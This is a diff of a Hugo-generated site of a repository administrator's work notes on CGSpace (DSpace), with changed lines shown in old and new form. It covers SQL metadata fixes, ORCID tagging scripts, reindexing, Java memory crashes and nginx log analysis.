<pre tabindex="0"><code>if(isBlank(value), &quot;Hernan Ceballos: 0000-0002-8744-7918&quot;, value + &quot;||Hernan Ceballos: 0000-0002-8744-7918&quot;)
<pre tabindex="0"><code>if(isBlank(value), &#34;Hernan Ceballos: 0000-0002-8744-7918&#34;, value + &#34;||Hernan Ceballos: 0000-0002-8744-7918&#34;)
</code></pre><ul>
<li>One thing that bothers me is that this won&rsquo;t honor author order</li>
<li>It might be better to do batches of these in PostgreSQL with a script that takes the <code>place</code> column of an author into account when setting the <code>cg.creator.id</code> (see the sketch after the CSV example below)</li>
@ -219,8 +219,8 @@ UPDATE 2309
<li>The CSV should have two columns: author name and ORCID identifier:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Orth, Alan&quot;,Alan S. Orth: 0000-0002-1735-7458
&quot;Orth, A.&quot;,Alan S. Orth: 0000-0002-1735-7458
&#34;Orth, Alan&#34;,Alan S. Orth: 0000-0002-1735-7458
&#34;Orth, A.&#34;,Alan S. Orth: 0000-0002-1735-7458
</code></pre><ul>
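<li>A rough sketch of that PostgreSQL approach (not the final script): for each name in the CSV, copy the author&rsquo;s <code>place</code> into the new <code>cg.creator.id</code> row so that ORCID order follows author order; field IDs 3 and 240 are the ones used elsewhere in these notes, and the file name is hypothetical:</li>
</ul>
<pre tabindex="0"><code>import csv
import psycopg2

conn = psycopg2.connect('dbname=dspace user=dspace password=fuuu host=localhost')
cursor = conn.cursor()

with open('2018-03-16-orcid-tags.csv') as csvfile:  # hypothetical input file
    for row in csv.DictReader(csvfile):
        # find items (resource_type_id=2) with this exact author name,
        # keeping each author's place so ORCID order follows author order
        cursor.execute(
            'SELECT resource_id, place FROM metadatavalue '
            'WHERE resource_type_id=2 AND metadata_field_id=3 '
            'AND text_value=%s',
            (row['dc.contributor.author'],))
        for resource_id, place in cursor.fetchall():
            # assumes metadatavalue_seq provides the primary key
            cursor.execute(
                'INSERT INTO metadatavalue (metadata_value_id, resource_id, '
                'resource_type_id, metadata_field_id, text_value, place) '
                'VALUES (nextval(\'metadatavalue_seq\'), %s, 2, 240, %s, %s)',
                (resource_id, row['cg.creator.id'], place))
conn.commit()
</code></pre><ul>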
<li>I didn&rsquo;t integrate the ORCID API lookup for author names in this script for now because I was only interested in &ldquo;tagging&rdquo; old items for a few given authors</li>
<li>I added ORCID identifiers for 187 items by CIAT&rsquo;s Hernan Ceballos, because that is what Elizabeth was trying to do manually!</li>
@ -240,10 +240,10 @@ UPDATE 2309
g/jspui/listings-and-reports
-- Method: POST
-- Parameters were:
-- selected_admin_preset: &quot;ilri authors2&quot;
-- load: &quot;normal&quot;
-- next: &quot;NEXT STEP &gt;&gt;&quot;
-- step: &quot;1&quot;
-- selected_admin_preset: &#34;ilri authors2&#34;
-- load: &#34;normal&#34;
-- next: &#34;NEXT STEP &gt;&gt;&#34;
-- step: &#34;1&#34;
org.apache.jasper.JasperException: java.lang.NullPointerException
</code></pre><ul>
@ -295,7 +295,7 @@ org.apache.jasper.JasperException: java.lang.NullPointerException
<li>I have removed the old server (linode02 aka linode578611) in favor of linode19 aka linode6624164</li>
<li>Looking at the CRP subjects on CGSpace I see there is one blank one so I&rsquo;ll just fix it:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value=&#39;&#39;;
</code></pre><ul>
<li>Copy all CRP subjects to a CSV to do the mass updates:</li>
</ul>
@ -304,7 +304,7 @@ COPY 21
</code></pre><ul>
<li>Once I prepare the new input forms (<a href="https://github.com/ilri/DSpace/issues/362">#362</a>) I will need to do the batch corrections:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.crp -t correct -m 230 -n -d
</code></pre><ul>
<li>Create a pull request to update the input forms for the new CRP subject style (<a href="https://github.com/ilri/DSpace/pull/366">#366</a>)</li>
</ul>
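<ul>
<li>For context, the heart of <code>fix-metadata-values.py</code> is essentially a CSV-driven batch of <code>UPDATE</code>s; a simplified sketch (the real script also handles dry runs and prints counts):</li>
</ul>
<pre tabindex="0"><code>import csv
import psycopg2

conn = psycopg2.connect('dbname=dspace user=dspace password=fuuu host=localhost')
cursor = conn.cursor()

with open('Correct-21-CRPs-2018-03-16.csv') as csvfile:
    for row in csv.DictReader(csvfile):
        # CSV columns match the -f and -t options: the current value
        # and its correction; 230 is cg.contributor.crp
        cursor.execute(
            'UPDATE metadatavalue SET text_value=%s '
            'WHERE resource_type_id=2 AND metadata_field_id=230 '
            'AND text_value=%s',
            (row['correct'], row['cg.contributor.crp']))
conn.commit()
</code></pre>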
@ -322,7 +322,7 @@ COPY 21
</code></pre><ul>
<li>But these errors, I don&rsquo;t even know what they mean, because a handful of them happen every day:</li>
</ul>
<pre tabindex="0"><code>$ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
<pre tabindex="0"><code>$ grep -c &#39;ERROR org.dspace.storage.rdbms.DatabaseManager&#39; dspace.log.2018-03-1*
dspace.log.2018-03-10:13
dspace.log.2018-03-11:15
dspace.log.2018-03-12:13
@ -336,7 +336,7 @@ dspace.log.2018-03-19:90
</code></pre><ul>
<li>There wasn&rsquo;t even a lot of traffic at the time (8&ndash;9 AM):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Mar/2018:0[89]:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Mar/2018:0[89]:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.197
92 83.103.94.48
96 40.77.167.175
@ -351,7 +351,7 @@ dspace.log.2018-03-19:90
<li>Well there is a hint in Tomcat&rsquo;s <code>catalina.out</code>:</li>
</ul>
<pre tabindex="0"><code>Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So someone was doing something heavy somehow&hellip; my guess is content and usage stats!</li>
<li>ICT responded that they &ldquo;fixed&rdquo; the CGSpace connectivity issue in Nairobi without telling me the problem</li>
@ -377,21 +377,21 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
<li>Abenet told me that one of Lance Robinson&rsquo;s ORCID iDs on CGSpace is incorrect</li>
<li>I will remove it from the controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/367">#367</a>) and update any items using the old one:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Lance W. Robinson: 0000-0002-5224-8644&#39; where resource_type_id=2 and metadata_field_id=240 and text_value like &#39;%0000-0002-6344-195X%&#39;;
UPDATE 1
</code></pre><ul>
<li>Communicate with DSpace editors on Yammer about being more careful about spaces and character editing when doing manual metadata edits</li>
<li>Merge the changes to CRP names to the <code>5_x-prod</code> branch and deploy on CGSpace (<a href="https://github.com/ilri/DSpace/pull/363">#363</a>)</li>
<li>Run corrections for CRP names in the database:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Run all system updates on CGSpace (linode18) and reboot the server</li>
<li>I started a full Discovery re-index on CGSpace because of the updated CRPs</li>
<li>I see this error in the DSpace log:</li>
</ul>
<pre tabindex="0"><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for field &quot;dc_contributor_author&quot;.
java.lang.IllegalArgumentException: No choices plugin was configured for field &quot;dc_contributor_author&quot;.
<pre tabindex="0"><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for field &#34;dc_contributor_author&#34;.
java.lang.IllegalArgumentException: No choices plugin was configured for field &#34;dc_contributor_author&#34;.
at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:261)
at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:249)
at org.dspace.browse.SolrBrowseCreateDAO.additionalIndex(SolrBrowseCreateDAO.java:215)
@ -415,15 +415,15 @@ java.lang.IllegalArgumentException: No choices plugin was configured for field
<li>Unfortunately this causes those items to simply not be indexed, which users noticed because item counts were cut in half and old items showed up in RSS!</li>
<li>Since we&rsquo;ve migrated the ORCID identifiers associated with the authority data to the <code>cg.creator.id</code> field we can nullify the authorities remaining in the database:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
<span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
</span></span></code></pre></div><ul>
<li>After this the indexing works as usual and item counts and facets are back to normal</li>
<li>Send Peter a list of all authors to correct:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
<span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
</span></span></code></pre></div><ul>
<li>Afterwards we&rsquo;ll want to do some batch tagging of ORCID identifiers to these names</li>
<li>CGSpace crashed again this afternoon; I&rsquo;m not sure of the cause, but there are a lot of SQL errors in the DSpace log:</li>
</ul>
@ -432,7 +432,7 @@ java.sql.SQLException: Connection has already been closed.
</code></pre><ul>
<li>I have no idea why so many connections were abandoned this afternoon:</li>
</ul>
<pre tabindex="0"><code># grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
<pre tabindex="0"><code># grep &#39;Mar 21, 2018&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
268
</code></pre><ul>
<li>DSpace Test crashed again due to Java heap space, this is from the DSpace log:</li>
@ -448,7 +448,7 @@ java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>But there are tons of heap space errors on DSpace Test actually:</li>
</ul>
<pre tabindex="0"><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
319
</code></pre><ul>
<li>I guess we need to give it more RAM because it now has CGSpace&rsquo;s large Solr core</li>
@ -521,8 +521,8 @@ sys 2m45.135s
<p>Test the corrections and deletions locally, then run them on CGSpace:</p>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Afterwards I started a full Discovery reindexing on both CGSpace and DSpace Test</li>
<li>CGSpace took 76m28.292s</li>
@ -542,12 +542,12 @@ $ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.cont
<li>DSpace Test crashed due to heap space so I&rsquo;ve increased it from 4096m to 5120m</li>
<li>The error in Tomcat&rsquo;s <code>catalina.out</code> was:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;RMI TCP Connection(idle)&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;RMI TCP Connection(idle)&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>Add ISI Journal (cg.isijournal) as an option in Atmire&rsquo;s Listing and Reports layout (<a href="https://github.com/ilri/DSpace/pull/370">#370</a>) for Abenet</li>
<li>I noticed a few hundred CRPs using the old capitalized formatting so I corrected them:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p &#39;fuuu&#39;
Fixed 29 occurences of: CLIMATE CHANGE, AGRICULTURE AND FOOD SECURITY
Fixed 7 occurences of: WATER, LAND AND ECOSYSTEMS
Fixed 19 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH

View File

@ -26,7 +26,7 @@ Catalina logs at least show some memory errors yesterday:
I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when
Catalina logs at least show some memory errors yesterday:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -121,7 +121,7 @@ Catalina logs at least show some memory errors yesterday:
SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]]
java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;ContainerBackgroundProcessor[StandardEngine[Catalina]]&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;ContainerBackgroundProcessor[StandardEngine[Catalina]]&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So this is getting super annoying</li>
<li>I ran all system updates on DSpace Test and rebooted it</li>
@ -134,12 +134,12 @@ Exception in thread &quot;ContainerBackgroundProcessor[StandardEngine[Catalina]]
<li>Peter noticed that there were still some old CRP names on CGSpace, because I hadn&rsquo;t forced the Discovery index to be updated after I fixed the others last week</li>
<li>For completeness I re-ran the CRP corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
Fixed 1 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
</code></pre><ul>
<li>Then started a full Discovery index:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 76m13.841s
@ -149,12 +149,12 @@ sys 2m2.498s
<li>Elizabeth from CIAT emailed to ask if I could help her by adding ORCID identifiers to all of Joseph Tohme&rsquo;s items</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The CSV format of <code>jtohme-2018-04-04.csv</code> was:</li>
</ul>
<pre tabindex="0"><code class="language-csv" data-lang="csv">dc.contributor.author,cg.creator.id
&quot;Tohme, Joseph M.&quot;,Joe Tohme: 0000-0003-2765-7101
&#34;Tohme, Joseph M.&#34;,Joe Tohme: 0000-0003-2765-7101
</code></pre><ul>
<li>There was a quoting error in my CRP CSV and the replacements for <code>Forests, Trees and Agroforestry</code> got messed up</li>
<li>So I fixed them and had to re-index again!</li>
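<li>For example, any CRP name containing commas has to be quoted in the correction CSV or the columns shift (hypothetical rows):</li>
</ul>
<pre tabindex="0"><code class="language-csv" data-lang="csv">cg.contributor.crp,correct
&quot;FORESTS, TREES AND AGROFORESTRY&quot;,&quot;Forests, Trees and Agroforestry&quot;
</code></pre><ul>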
@ -193,7 +193,7 @@ sys 2m52.585s
<li>Help Peter with the GDPR compliance / reporting form for CGSpace</li>
<li>DSpace Test crashed due to memory issues again:</li>
</ul>
<pre tabindex="0"><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
16
</code></pre><ul>
<li>I ran all system updates on DSpace Test and rebooted it</li>
@ -205,7 +205,7 @@ sys 2m52.585s
<li>I got a notice that CGSpace CPU usage was very high this morning</li>
<li>Looking at the nginx logs, here are the top users today so far:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Apr/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
282 207.46.13.112
286 54.175.208.220
287 207.46.13.113
@ -220,24 +220,24 @@ sys 2m52.585s
<li>45.5.186.2 is of course CIAT</li>
<li>95.108.181.88 appears to be Yandex:</li>
</ul>
<pre tabindex="0"><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &quot;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&quot; 200 2638 &quot;-&quot; &quot;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot;
<pre tabindex="0"><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &#34;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&#34; 200 2638 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
</code></pre><ul>
<li>And for some reason Yandex created a lot of Tomcat sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-04-10
4363
</code></pre><ul>
<li>70.32.83.92 appears to be some harvester we&rsquo;ve seen before, but on a new IP</li>
<li>They are not creating new Tomcat sessions so there is no problem there</li>
<li>178.154.200.38 also appears to be Yandex, and is also creating many Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38&#39; dspace.log.2018-04-10
3982
</code></pre><ul>
<li>I&rsquo;m not sure why Yandex creates so many Tomcat sessions, as its user agent should match the Crawler Session Manager valve</li>
<li>Let&rsquo;s try a manual request with and without their user agent:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg &#39;User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#39;
GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -294,7 +294,7 @@ X-XSS-Protection: 1; mode=block
<ul>
<li>In other news, it looks like the number of total requests processed by nginx in March went down from the previous months:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2018&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2018&#34;
2266594
real 0m13.658s
@ -305,23 +305,23 @@ sys 0m1.087s
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(151626) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(151626) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);&#39;
UPDATE 1
</code></pre><ul>
<li>Looking at abandoned connections in Tomcat:</li>
</ul>
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
2115
</code></pre><ul>
<li>Apparently from these stacktraces we should be able to see which code is not closing connections properly</li>
<li>Here&rsquo;s a pretty good overview of days where we had database issues recently:</li>
</ul>
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; | awk &#39;{print $1,$2, $3}&#39; | sort | uniq -c | sort -n
1 Feb 18, 2018
1 Feb 19, 2018
1 Feb 20, 2018
@ -356,7 +356,7 @@ UPDATE 1
<ul>
<li>DSpace Test (linode19) crashed again some time since yesterday:</li>
</ul>
<pre tabindex="0"><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
168
</code></pre><ul>
<li>I ran all system updates and rebooted the server</li>
@ -374,7 +374,7 @@ UPDATE 1
<ul>
<li>While testing an XMLUI patch for <a href="https://jira.duraspace.org/browse/DS-3883">DS-3883</a> I noticed that there is still some remaining Authority / Solr configuration left that we need to remove:</li>
</ul>
<pre tabindex="0"><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &quot;solr.authority.server&quot; property in the dspace.cfg
<pre tabindex="0"><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &#34;solr.authority.server&#34; property in the dspace.cfg
java.lang.NullPointerException
</code></pre><ul>
<li>I assume we need to remove <code>authority</code> from the consumers in <code>dspace/config/dspace.cfg</code>:</li>
@ -422,14 +422,14 @@ webui.itemlist.sort-option.4 = type:dc.type:text
<li>They are missing the <code>order</code> parameter (ASC vs DESC)</li>
<li>I notice that DSpace Test has crashed again, due to memory:</li>
</ul>
<pre tabindex="0"><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
178
</code></pre><ul>
<li>I will increase the JVM heap size from 5120M to 6144M, though we don&rsquo;t have much room left to grow as DSpace Test (linode19) is using a smaller instance size than CGSpace</li>
<li>Gabriela from CIP asked if I could send her a list of all CIP authors so she can do some replacements on the name formats</li>
<li>I got a list of all the CIP collections manually and use the same query that I used in <a href="/cgspace-notes/2017-08">August, 2017</a>:</li>
</ul>
